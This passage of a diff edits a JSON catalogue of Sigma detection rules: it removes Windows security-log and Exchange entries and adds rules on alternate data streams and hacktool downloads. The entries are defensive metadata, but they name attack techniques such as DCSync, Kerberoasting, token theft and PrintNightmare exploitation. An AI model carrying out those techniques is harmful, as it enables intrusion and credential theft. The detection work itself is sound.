- "https://github.com/rapid7/metasploit-framework/blob/1416b5776d963f21b7b5b45d19f3e961201e0aed/modules/exploits/windows/http/exchange_proxyshell_rce.rb#L430",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/msexchange/win_exchange_proxyshell_remove_mailbox_export.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1070"
- ]
- },
- "uuid": "09570ae5-889e-43ea-aac0-0e1221fb3d95",
- "value": "Remove Exported Mailbox from Exchange Webserver"
- },
- {
- "description": "Rule to detect an adversary setting OabVirtualDirectory External URL property to a script in Exchange Management log",
- "meta": {
- "author": "Jose Rodriguez @Cyb3rPandaH",
- "creation_date": "2021/03/15",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "win_exchange_set_oabvirtualdirectory_externalurl.yml",
- "level": "high",
- "logsource.category": "No established category",
- "logsource.product": "windows",
- "refs": [
- "https://twitter.com/OTR_Community/status/1371053369071132675",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/msexchange/win_exchange_set_oabvirtualdirectory_externalurl.yml"
- ],
- "tags": [
- "attack.persistence",
- "attack.t1505.003"
- ]
- },
- "uuid": "9db37458-4df2-46a5-95ab-307e7f29e675",
- "value": "Exchange Set OabVirtualDirectory ExternalUrl Property"
- },
 {
 "description": "Detects the Installation of a Exchange Transport Agent",
 "meta": {
@@ -14473,1832 +10710,632 @@
 "value": "MSExchange Transport Agent Installation - Builtin"
 },
 {
- "description": "Detects a failed installation of a Exchange Transport Agent",
+ "description": "Exports the target Registry key and hides it in the specified alternate data stream.",
 "meta": {
- "author": "Tobias Michalski",
- "creation_date": "2021/06/08",
+ "author": "Oddvar Moe, Sander Wiebing, oscd.community",
+ "creation_date": "2020/10/07",
 "falsepositive": [
- "Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this."
+ "Unknown"
 ],
- "filename": "win_exchange_transportagent_failed.yml",
+ "filename": "create_stream_hash_regedit_export_to_ads.yml",
 "level": "high",
- "logsource.category": "No established category",
+ "logsource.category": "create_stream_hash",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/blueteamsec1/status/1401290874202382336?s=20",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/msexchange/win_exchange_transportagent_failed.yml"
- ],
- "tags": [
- "attack.persistence",
- "attack.t1505.002"
- ]
- },
- "uuid": "c7d16cae-aaf3-42e5-9c1c-fb8553faa6fa",
- "value": "Failed MSExchange Transport Agent Installation"
- },
- {
- "description": "Detects logons using NTLM, which could be caused by a legacy source or attackers",
- "meta": {
- "author": "Florian Roth",
- "creation_date": "2018/06/08",
- "falsepositive": [
- "Legacy hosts"
- ],
- "filename": "win_susp_ntlm_auth.yml",
- "level": "low",
- "logsource.category": "No established category",
- "logsource.product": "windows",
- "refs": [
- "https://twitter.com/JohnLaTwC/status/1004895028995477505",
- "https://goo.gl/PsqrhT",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/ntlm/win_susp_ntlm_auth.yml"
- ],
- "tags": [
- "attack.lateral_movement",
- "attack.t1550.002"
- ]
- },
- "uuid": "98c3bcf1-56f2-49dc-9d8d-c66cf190238b",
- "value": "NTLM Logon"
- },
- {
- "description": "Detects common NTLM brute 
force device names",
- "meta": {
- "author": "Jerry Shockley '@jsh0x'",
- "creation_date": "2022/02/02",
- "falsepositive": [
- "Systems with names equal to the spoofed ones used by the brute force tools"
- ],
- "filename": "win_susp_ntlm_brute_force.yml",
- "level": "medium",
- "logsource.category": "No established category",
- "logsource.product": "windows",
- "refs": [
- "https://www.varonis.com/blog/investigate-ntlm-brute-force",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/ntlm/win_susp_ntlm_brute_force.yml"
- ],
- "tags": [
- "attack.credential_access",
- "attack.t1110"
- ]
- },
- "uuid": "9c8acf1a-cbf9-4db6-b63c-74baabe03e59",
- "value": "NTLM Brute Force"
- },
- {
- "description": "Detects logons using NTLM to hosts that are potentially not part of the domain.",
- "meta": {
- "author": "James Pemberton",
- "creation_date": "2020/05/22",
- "falsepositive": [
- "Host connections to valid domains, exclude these.",
- "Host connections not using host FQDN.",
- "Host connections to external legitimate domains." 
- ],
- "filename": "win_susp_ntlm_rdp.yml",
- "level": "medium",
- "logsource.category": "No established category",
- "logsource.product": "windows",
- "refs": [
- "n/a",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/ntlm/win_susp_ntlm_rdp.yml"
- ],
- "tags": [
- "attack.command_and_control",
- "attack.t1219"
- ]
- },
- "uuid": "ce5678bb-b9aa-4fb5-be4b-e57f686256ad",
- "value": "Potential Remote Desktop Connection to Non-Domain Host"
- },
- {
- "description": "Detects scenarios where an attacker enables the OpenSSH server and server starts to listening on SSH socket.",
- "meta": {
- "author": "mdecrevoisier",
- "creation_date": "2022/10/25",
- "falsepositive": [
- "Legitimate administrator activity"
- ],
- "filename": "win_sshd_openssh_server_listening_on_socket.yml",
- "level": "medium",
- "logsource.category": "No established category",
- "logsource.product": "windows",
- "refs": [
- "https://github.com/mdecrevoisier/EVTX-to-MITRE-Attack/tree/master/TA0008-Lateral%20Movement/T1021.004-Remote%20Service%20SSH",
- "https://winaero.com/enable-openssh-server-windows-10/",
- "https://docs.microsoft.com/en-us/windows-server/administration/openssh/openssh_install_firstuse",
- "https://virtualizationreview.com/articles/2020/05/21/ssh-server-on-windows-10.aspx",
- "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/openssh/win_sshd_openssh_server_listening_on_socket.yml"
- ],
- "tags": [
- "attack.lateral_movement",
- "attack.t1021.004"
- ]
- },
- "uuid": "3ce8e9a4-bc61-4c9b-8e69-d7e2492a8781",
- "value": "OpenSSH Server Listening On Socket"
- },
- {
- "description": "Detects events of driver load errors in print service logs that could be a sign of successful exploitation attempts of print spooler vulnerability CVE-2021-1675",
- "meta": {
- "author": "Florian Roth, KevTheHermit, fuzzyf10w, Tim Shelton",
- 
"creation_date": "2021/06/30",
- "falsepositive": [
- "Problems with printer drivers"
- ],
- "filename": "win_exploit_cve_2021_1675_printspooler.yml",
- "level": "high",
- "logsource.category": "No established category",
- "logsource.product": "windows",
- "refs": [
- "https://github.com/hhlxf/PrintNightmare",
- "https://github.com/afwu/PrintNightmare",
- "https://twitter.com/fuzzyf10w/status/1410202370835898371",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/printservice/win_exploit_cve_2021_1675_printspooler.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1569",
- "cve.2021.1675"
- ]
- },
- "uuid": "4e64668a-4da1-49f5-a8df-9e2d5b866718",
- "value": "Possible CVE-2021-1675 Print Spooler Exploitation"
- },
- {
- "description": "Detects driver load events print service operational log that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675",
- "meta": {
- "author": "Florian Roth",
- "creation_date": "2021/07/01",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "win_exploit_cve_2021_1675_printspooler_operational.yml",
- "level": "critical",
- "logsource.category": "No established category",
- "logsource.product": "windows",
- "refs": [
- "https://twitter.com/MalwareJake/status/1410421967463731200",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/printservice/win_exploit_cve_2021_1675_printspooler_operational.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1569",
- "cve.2021.1675"
- ]
- },
- "uuid": "f34d942d-c8c4-4f1f-b196-22471aecf10a",
- "value": "CVE-2021-1675 Print Spooler Exploitation"
- },
- {
- "description": "This detection uses Windows security events to detect suspicious access attempts to the registry key of Azure AD Health monitoring agent.\nThis detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object HKLM\\SOFTWARE\\Microsoft\\Microsoft Online\\Reporting\\MonitoringAgent.\n",
- 
"meta": {
- "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC",
- "creation_date": "2021/08/26",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "win_security_aadhealth_mon_agent_regkey_access.yml",
- "level": "medium",
- "logsource.category": "No established category",
- "logsource.product": "windows",
- "refs": [
- "https://o365blog.com/post/hybridhealthagent/",
- "https://github.com/OTRF/Set-AuditRule/blob/c3dec5443414231714d850565d364ca73475ade5/rules/registry/aad_connect_health_monitoring_agent.yml",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_aadhealth_mon_agent_regkey_access.yml"
- ],
- "tags": [
- "attack.discovery",
- "attack.t1012"
- ]
- },
- "uuid": "ff151c33-45fa-475d-af4f-c2f93571f4fe",
- "value": "Azure AD Health Monitoring Agent Registry Keys Access"
- },
- {
- "description": "This detection uses Windows security events to detect suspicious access attempts to the registry key values and sub-keys of Azure AD Health service agents (e.g AD FS).\nInformation from AD Health service agents can be used to potentially abuse some of the features provided by those services in the cloud (e.g. 
Federation).\nThis detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object: HKLM:\\SOFTWARE\\Microsoft\\ADHealthAgent.\nMake sure you set the SACL to propagate to its sub-keys.\n",
- "meta": {
- "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC",
- "creation_date": "2021/08/26",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "win_security_aadhealth_svc_agent_regkey_access.yml",
- "level": "medium",
- "logsource.category": "No established category",
- "logsource.product": "windows",
- "refs": [
- "https://o365blog.com/post/hybridhealthagent/",
- "https://github.com/OTRF/Set-AuditRule/blob/c3dec5443414231714d850565d364ca73475ade5/rules/registry/aad_connect_health_service_agent.yml",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_aadhealth_svc_agent_regkey_access.yml"
- ],
- "tags": [
- "attack.discovery",
- "attack.t1012"
- ]
- },
- "uuid": "1d2ab8ac-1a01-423b-9c39-001510eae8e8",
- "value": "Azure AD Health Service Agents Registry Keys Access"
- },
- {
- "description": "This rule tries to detect token impersonation and theft. 
(Example: DuplicateToken(Ex) and ImpersonateLoggedOnUser with the LOGON32_LOGON_NEW_CREDENTIALS flag.)",
- "meta": {
- "author": "Michaela Adams, Zach Mathis",
- "creation_date": "2022/11/06",
- "falsepositive": [
- "Anti-Virus"
- ],
- "filename": "win_security_access_token_abuse.yml",
- "level": "medium",
- "logsource.category": "No established category",
- "logsource.product": "windows",
- "refs": [
- "https://attack.mitre.org/techniques/T1134/001/",
- "https://www.elastic.co/fr/blog/how-attackers-abuse-access-token-manipulation",
- "https://www.manageengine.com/log-management/cyber-security/access-token-manipulation.html",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_access_token_abuse.yml"
+ "https://lolbas-project.github.io/lolbas/Binaries/Regedit/",
+ "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_regedit_export_to_ads.yml"
 ],
 "tags": [
 "attack.defense_evasion",
- "attack.privilege_escalation",
- "attack.t1134.001"
+ "attack.t1564.004"
 ]
 },
- "uuid": "02f7c9c1-1ae8-4c6a-8add-04693807f92f",
- "value": "Access Token Abuse"
+ "uuid": "0d7a9363-af70-4e7b-a3b7-1a176b7fbe84",
+ "value": "Exports Registry Key To an Alternate Data Stream"
 },
 {
- "description": "Backdooring domain object to grant the rights associated with DCSync to a regular user or machine account using Powerview\\Add-DomainObjectAcl DCSync Extended Right cmdlet, will allow to re-obtain the pwd hashes of any user/computer",
+ "description": "Detects the download of suspicious file type from a well-known file and paste sharing domain",
 "meta": {
- "author": "Samir Bousseaden; Roberto Rodriguez @Cyb3rWard0g; oscd.community; Tim Shelton; Maxence Fossat",
- "creation_date": "2019/04/03",
+ "author": "Florian Roth",
+ "creation_date": "2022/08/24",
 "falsepositive": [
- "New Domain Controller computer account, check user SIDs within the 
value attribute of event 5136 and verify if it's a regular user or DC computer account."
+ "Unknown"
 ],
- "filename": "win_security_account_backdoor_dcsync_rights.yml",
+ "filename": "create_stream_hash_susp_domain_ext_combo.yml",
 "level": "high",
- "logsource.category": "No established category",
+ "logsource.category": "create_stream_hash",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/menasec1/status/1111556090137903104",
- "https://www.specterops.io/assets/resources/an_ace_up_the_sleeve.pdf",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_account_backdoor_dcsync_rights.yml"
+ "https://www.cisa.gov/uscert/ncas/alerts/aa22-321a",
+ "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90015",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_susp_domain_ext_combo.yml"
 ],
 "tags": [
- "attack.persistence",
- "attack.t1098"
+ "attack.defense_evasion",
+ "attack.s0139",
+ "attack.t1564.004"
 ]
 },
- "uuid": "2c99737c-585d-4431-b61a-c911d86ff32f",
- "value": "Powerview Add-DomainObjectAcl DCSync AD Extend Right"
+ "uuid": "52182dfb-afb7-41db-b4bc-5336cb29b464",
+ "value": "Suspicious File Download from File Sharing Domain"
 },
 {
- "description": "Detect priv users or groups recon based on 4661 eventid and known privileged users or groups SIDs",
+ "description": "Detects the download of suspicious file type from a well-known file and paste sharing domain",
 "meta": {
- "author": "Samir Bousseaden",
- "creation_date": "2019/04/03",
+ "author": "Florian Roth",
+ "creation_date": "2022/08/24",
 "falsepositive": [
- "If source account name is not an admin then its super suspicious"
+ "Unknown"
 ],
- "filename": "win_security_account_discovery.yml",
- "level": "high",
- "logsource.category": "No established category",
+ "filename": "create_stream_hash_susp_domain_ext_combo_med.yml",
+ "level": "medium",
+ "logsource.category": 
"create_stream_hash",
 "logsource.product": "windows",
 "refs": [
- "https://blog.menasec.net/2019/02/threat-hunting-5-detecting-enumeration.html",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_account_discovery.yml"
+ "https://www.cisa.gov/uscert/ncas/alerts/aa22-321a",
+ "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90015",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_susp_domain_ext_combo_med.yml"
 ],
 "tags": [
- "attack.discovery",
- "attack.t1087.002"
+ "attack.defense_evasion",
+ "attack.s0139",
+ "attack.t1564.004"
 ]
 },
- "uuid": "35ba1d85-724d-42a3-889f-2e2362bcaf23",
- "value": "AD Privileged Users or Groups Reconnaissance"
+ "uuid": "ae02ed70-11aa-4a22-b397-c0d0e8f6ea99",
+ "value": "Unusual File Download from File Sharing Domain"
 },
 {
- "description": "Detects certificate creation with template allowing risk permission subject",
- "meta": {
- "author": "Orlinum , BlueDefenZer",
- "creation_date": "2021/11/17",
- "falsepositive": [
- "Administrator activity",
- "Proxy SSL certificate with subject modification",
- "Smart card enrollement"
- ],
- "filename": "win_security_adcs_certificate_template_configuration_vulnerability.yml",
- "level": "low",
- "logsource.category": "No established category",
- "logsource.product": "windows",
- "refs": [
- "https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_adcs_certificate_template_configuration_vulnerability.yml"
- ],
- "tags": [
- "attack.privilege_escalation",
- "attack.credential_access"
- ]
- },
- "uuid": "5ee3a654-372f-11ec-8d3d-0242ac130003",
- "value": "ADCS Certificate Template Configuration Vulnerability"
- },
- {
- "description": "Detects certificate creation with template allowing risk permission subject and risky EKU",
- "meta": {
- "author": "Orlinum , 
BlueDefenZer", - "creation_date": "2021/11/17", - "falsepositive": [ - "Administrator activity", - "Proxy SSL certificate with subject modification", - "Smart card enrollement" - ], - "filename": "win_security_adcs_certificate_template_configuration_vulnerability_eku.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_adcs_certificate_template_configuration_vulnerability_eku.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.credential_access" - ] - }, - "uuid": "bfbd3291-de87-4b7c-88a2-d6a5deb28668", - "value": "ADCS Certificate Template Configuration Vulnerability with Risky EKU" - }, - { - "description": "Detects the creation or removal of a computer. Can be used to detect attacks such as DCShadow via the creation of a new SPN.", + "description": "Detects the creation of a suspicious ADS (Alternate Data Stream) file by software other than browsers", "meta": { "author": "frack113", - "creation_date": "2022/10/14", + "creation_date": "2022/10/22", "falsepositive": [ - "Unknown" + "Other legitimate browsers not currently included in the filter (please add them)", + "Legitimate downloads via scripting or command-line tools (Investigate to determine if it's legitimate)" ], - "filename": "win_security_add_remove_computer.yml", - "level": "low", - "logsource.category": "No established category", + "filename": "create_stream_hash_creation_internet_file.yml", + "level": "medium", + "logsource.category": "create_stream_hash", "logsource.product": "windows", "refs": [ - "https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md", - "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4741", - 
"https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4743", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_add_remove_computer.yml" - ], - "tags": "No established tags" - }, - "uuid": "20d96d95-5a20-4cf1-a483-f3bda8a7c037", - "value": "Add or Remove Computer from DC" - }, - { - "description": "Detects logon with \"Special groups\" and \"Special Privileges\" can be thought of as Administrator groups or privileges.", - "meta": { - "author": "frack113", - "creation_date": "2022/10/14", - "falsepositive": [ - "Unknown" - ], - "filename": "win_security_admin_logon.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md", - "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4672", - "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4964", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_admin_logon.yml" - ], - "tags": "No established tags" - }, - "uuid": "94309181-d345-4cbf-b5fe-061769bdf9cb", - "value": "User with Privileges Logon" - }, - { - "description": "Detect remote login by Administrator user (depending on internal pattern).", - "meta": { - "author": "juju4", - "creation_date": "2017/10/29", - "falsepositive": [ - "Legitimate administrative activity." 
- ], - "filename": "win_security_admin_rdp_login.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://car.mitre.org/wiki/CAR-2016-04-005", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_admin_rdp_login.yml" + "https://www.bleepingcomputer.com/news/security/exploited-windows-zero-day-lets-javascript-files-bypass-security-warnings/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_creation_internet_file.yml" ], "tags": [ - "attack.lateral_movement", - "attack.t1078.001", - "attack.t1078.002", - "attack.t1078.003", - "car.2016-04-005" + "attack.defense_evasion" ] }, - "uuid": "0f63e1ef-1eb9-4226-9d54-8927ca08520a", - "value": "Admin User Remote Logon" + "uuid": "573df571-a223-43bc-846e-3f98da481eca", + "value": "Creation Of a Suspicious ADS File Outside a Browser Download" }, { - "description": "Detects access to $ADMIN share", + "description": "Detects the download of suspicious file type from URLs with IP", + "meta": { + "author": "Nasreddine Bencherchali, Florian Roth", + "creation_date": "2022/09/07", + "falsepositive": [ + "Unknown" + ], + "filename": "create_stream_hash_susp_ip_domains.yml", + "level": "high", + "logsource.category": "create_stream_hash", + "logsource.product": "windows", + "refs": [ + "https://github.com/trustedsec/SysmonCommunityGuide/blob/adcdfee20999f422b974c8d4149bf4c361237db7/chapters/file-stream-creation-hash.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_susp_ip_domains.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.004" + ] + }, + "uuid": "025bd229-fd1f-4fdb-97ab-20006e1a5368", + "value": "Unusual File Download from Direct IP Address" + }, + { + "description": "Detects the creation of a file on disk that has an imphash of a well-known hack tool", "meta": { "author": "Florian Roth", - 
"creation_date": "2017/03/04", - "falsepositive": [ - "Legitimate administrative activity" - ], - "filename": "win_security_admin_share_access.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_admin_share_access.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1021.002" - ] - }, - "uuid": "098d7118-55bc-4912-a836-dc6483a8d150", - "value": "Access to ADMIN$ Share" - }, - { - "description": "Detects WRITE_DAC access to a domain object", - "meta": { - "author": "Roberto Rodriguez @Cyb3rWard0g", - "creation_date": "2019/09/12", + "creation_date": "2022/08/24", "falsepositive": [ "Unknown" ], - "filename": "win_security_ad_object_writedac_access.yml", - "level": "critical", - "logsource.category": "No established category", + "filename": "create_stream_hash_hacktool_download.yml", + "level": "high", + "logsource.category": "create_stream_hash", "logsource.product": "windows", "refs": [ - "https://threathunterplaybook.com/notebooks/windows/05_defense_evasion/WIN-190101151110.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_ad_object_writedac_access.yml" + "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90015", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_hacktool_download.yml" ], "tags": [ "attack.defense_evasion", - "attack.t1222.001" + "attack.s0139", + "attack.t1564.004" ] }, - "uuid": "028c7842-4243-41cd-be6f-12f3cf1a26c7", - "value": "AD Object WriteDAC Access" + "uuid": "19b041f6-e583-40dc-b842-d6fa8011493f", + "value": "Hacktool Download" }, { - "description": "Detects potential abuse of Active Directory Replication Service (ADRS) from a non machine account to request credentials.", + "description": "Detects the creation of an ADS data stream that 
contains an executable (non-empty imphash)", "meta": { - "author": "Roberto Rodriguez @Cyb3rWard0g", - "creation_date": "2019/07/26", - "falsepositive": [ - "Unknown" - ], - "filename": "win_security_ad_replication_non_machine_account.yml", - "level": "critical", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://threathunterplaybook.com/notebooks/windows/06_credential_access/WIN-180815210510.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_ad_replication_non_machine_account.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.006" - ] - }, - "uuid": "17d619c1-e020-4347-957e-1d1207455c93", - "value": "Active Directory Replication from Non Machine Account" - }, - { - "description": "Detects access to a domain user from a non-machine account", - "meta": { - "author": "Maxime Thiebaut (@0xThiebaut)", - "creation_date": "2020/03/30", - "falsepositive": [ - "Administrators configuring new users." 
- ], - "filename": "win_security_ad_user_enumeration.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://www.specterops.io/assets/resources/an_ace_up_the_sleeve.pdf", - "http://www.stuffithoughtiknew.com/2019/02/detecting-bloodhound.html", - "https://docs.microsoft.com/en-us/windows/win32/adschema/attributes-all", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_ad_user_enumeration.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1087.002" - ] - }, - "uuid": "ab6bffca-beff-4baa-af11-6733f296d57a", - "value": "AD User Enumeration" - }, - { - "description": "Detects scenario where if a user is assigned the SeEnableDelegationPrivilege right in Active Directory it would allow control of other AD user objects.", - "meta": { - "author": "@neu5ron", - "creation_date": "2017/07/30", - "falsepositive": [ - "Unknown" - ], - "filename": "win_security_alert_active_directory_user_control.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://www.harmj0y.net/blog/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_alert_active_directory_user_control.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1098" - ] - }, - "uuid": "311b6ce2-7890-4383-a8c2-663a9f6b43cd", - "value": "Enabled User Right in AD to Control User Objects" - }, - { - "description": "Detects scenarios where one can control another users or computers account without having to use their credentials.", - "meta": { - "author": "@neu5ron", - "creation_date": "2017/04/13", - "falsepositive": [ - "Unknown" - ], - "filename": "win_security_alert_ad_user_backdoors.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - 
"https://msdn.microsoft.com/en-us/library/cc220234.aspx", - "https://adsecurity.org/?p=3466", - "https://www.harmj0y.net/blog/redteaming/another-word-on-delegation/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_alert_ad_user_backdoors.yml" - ], - "tags": [ - "attack.t1098", - "attack.persistence" - ] - }, - "uuid": "300bac00-e041-4ee2-9c36-e262656a6ecc", - "value": "Active Directory User Backdoors" - }, - { - "description": "Detects scenario where weak encryption is enabled for a user profile which could be used for hash/password cracking.", - "meta": { - "author": "@neu5ron", - "creation_date": "2017/07/30", - "falsepositive": [ - "Unknown" - ], - "filename": "win_security_alert_enable_weak_encryption.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://adsecurity.org/?p=2053", - "https://www.harmj0y.net/blog/activedirectory/roasting-as-reps/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_alert_enable_weak_encryption.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ] - }, - "uuid": "f6de9536-0441-4b3f-a646-f4e00f300ffd", - "value": "Weak Encryption Enabled and Kerberoast" - }, - { - "description": "This events that are generated when using the hacktool Ruler by Sensepost", - "meta": { - "author": "Florian Roth", - "creation_date": "2017/05/31", - "falsepositive": [ - "Go utilities that use staaldraad awesome NTLM library" - ], - "filename": "win_security_alert_ruler.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/sensepost/ruler", - "https://github.com/sensepost/ruler/issues/47", - "https://github.com/staaldraad/go-ntlm/blob/cd032d41aa8ce5751c07cb7945400c0f5c81e2eb/ntlm/ntlmv1.go#L427", - 
"https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4776", - "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4624", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_alert_ruler.yml" - ], - "tags": [ - "attack.discovery", - "attack.execution", - "attack.t1087", - "attack.t1114", - "attack.t1059", - "attack.t1550.002" - ] - }, - "uuid": "24549159-ac1b-479c-8175-d42aea947cae", - "value": "Hacktool Ruler" - }, - { - "description": "Detects Chafer activity attributed to OilRig as reported in Nyotron report in March 2018", - "meta": { - "author": "Florian Roth, Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", - "creation_date": "2018/03/23", - "falsepositive": [ - "Unknown" - ], - "filename": "win_security_apt_chafer_mar18_security.yml", - "level": "critical", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://nyotron.com/nyotron-discovers-next-generation-oilrig-attacks/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_apt_chafer_mar18_security.yml" - ], - "tags": [ - "attack.persistence", - "attack.g0049", - "attack.t1053.005", - "attack.s0111", - "attack.t1543.003", - "attack.defense_evasion", - "attack.t1112", - "attack.command_and_control", - "attack.t1071.004" - ] - }, - "uuid": "c0580559-a6bd-4ef6-b9b7-83703d98b561", - "value": "Chafer Activity - Security" - }, - { - "description": "Detects the deactivation and disabling of the Scheduled defragmentation task as seen by Slingshot APT group", - "meta": { - "author": "Florian Roth, Bartlomiej Czyz (@bczyz1)", - "creation_date": "2019/03/04", - "falsepositive": [ - "Unknown" - ], - "filename": "win_security_apt_slingshot.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - 
"https://securelist.com/apt-slingshot/84312/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_apt_slingshot.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1053", - "attack.s0111" - ] - }, - "uuid": "c5a178bf-9cfb-4340-b584-e4df39b6a3e7", - "value": "Defrag Deactivation - Security" - }, - { - "description": "Detects activity mentioned in Operation Wocao report", - "meta": { - "author": "Florian Roth, frack113", - "creation_date": "2019/12/20", - "falsepositive": [ - "Administrators that use checkadmin.exe tool to enumerate local administrators" - ], - "filename": "win_security_apt_wocao.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/", - "https://twitter.com/SBousseaden/status/1207671369963646976", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_apt_wocao.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1012", - "attack.defense_evasion", - "attack.t1036.004", - "attack.t1027", - "attack.execution", - "attack.t1053.005", - "attack.t1059.001" - ] - }, - "uuid": "74ad4314-482e-4c3e-b237-3f7ed3b9ca8d", - "value": "Operation Wocao Activity - Security" - }, - { - "description": "Detects remote task creation via at.exe or API interacting with ATSVC namedpipe", - "meta": { - "author": "Samir Bousseaden", - "creation_date": "2019/04/03", - "falsepositive": [ - "Unknown" - ], - "filename": "win_security_atsvc_task.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://blog.menasec.net/2019/03/threat-hunting-25-scheduled-tasks-for.html", - 